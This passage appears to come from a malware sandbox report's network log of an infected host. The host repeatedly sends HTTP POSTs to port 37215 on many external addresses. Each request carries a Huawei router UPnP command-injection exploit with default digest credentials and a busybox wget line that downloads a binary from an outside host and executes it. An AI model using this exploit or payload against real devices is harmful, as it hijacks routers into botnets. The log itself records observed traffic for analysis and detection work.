2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1038192.168.2.154405241.112.154.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912401915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1039192.168.2.155315041.168.44.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912404060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1040192.168.2.155154841.42.70.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912406921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1041192.168.2.155065841.129.239.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912425995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1042192.168.2.154056241.139.146.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912426949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1043192.168.2.154540241.109.146.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912427902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1044192.168.2.155333841.13.177.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912427902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1045192.168.2.154153041.250.159.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912452936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1046192.168.2.153799241.201.105.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912497997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1047192.168.2.154538041.114.81.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912499905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1048192.168.2.155186841.123.137.19537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912506104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
